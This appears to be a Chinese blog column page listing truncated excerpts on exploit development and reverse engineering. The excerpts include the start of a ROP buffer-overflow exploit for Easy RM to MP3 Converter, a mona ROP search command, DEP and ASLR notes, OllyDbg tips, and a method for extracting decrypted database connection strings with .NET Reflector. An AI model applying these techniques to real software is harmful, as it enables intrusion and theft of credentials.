thesum的专栏

test.py:import ctypeslib = ctypes.CDLL('TCPSocket.dll')def opaque_ptr(name):    cls = type(name, (ctypes.Structure,),{})    return ctypes.POINTER(cls)class CTCPSocket(object):    _CTCPSo

!mona rop -m msvcr71.dll -n -cpb '\x0a\x0d'

Immdbg的pvefindaddr插件可以找到这种指令

汇编直接转换为C语言 Hex Rays Decompiler

#------------------------------------------------------------#ROP based exploit for Easy RM to MP3 Converter#written by corelanc0d3r - http://www.corelan.be#-------------------------------------

my $file="rop.m3u";my $buffersize=26094-20-8-4;my $junk="A"x$buffersize;my $eip=pack('V',0x100102DC);#pointer to retmy $junk2="AAAA";#compensate,to make sure esp points at first rop gadgetmy

使用工具PE EXPLOER打开，查看DllCharacteristics是否包含0x40就可以知道是否支持ASLR

bcdedit.exe /set nx OptInbcdedit.exe /set nx OptOutbcdedit.exe /set nx AlwaysOnbcdedit.exe /set nx AlwaysOff

enter语句的作用是:push ebpmov ebp,espsub esp,xxxleave语句的作用是add esp,xxxpop ebp

1.ollydbg可以直接在windows的api函数上下断点，但必须大小写正确如Ctrl+G  然后输入GetDlgItemTextA就可以到了这个函数的起始位置！

LibHandle=LoadLibrary("msadco.dll");    printf("kernel32 LibHandle=//x%x\n",LibHandle);    ProcAdd=(MYPROC)GetProcAddress(LibHandle,"CreateObject");    printf("WinExec=//x%x\n",ProcAdd);

_AfxDispatchCmdMsg(this, nID, nCode,lpEntry->pfn, pExtra,lpEntry->nSig, pHandlerInfo);在_AfxDispatchCmdMsg下断点，在[esp+8]的位置就是ID（通过ollydbg的windows可以查看到的），[esp+16]位置就是处理函数代码的位置！（3）为了定位到_AfxDispat

// myLoadLibrary.cpp : 定义控制台应用程序的入口点。//#include "stdafx.h"#include #include using namespace std;int _tmain(int argc, _TCHAR* argv[]){    typedef WORD (*pEncryptBuffer)(WORD wMainCm

1.用.net Reflector查看代码2.在任意执行sql的地方,找到连接到数据库的语句,如DBData.GetDataDBCommand();3.进入DBData.GetDataDBCommand();,会出现DBCommand(xx.DataDBType, xx.DataDBConnString);4.xx.DataDBConnString就是解密后的内容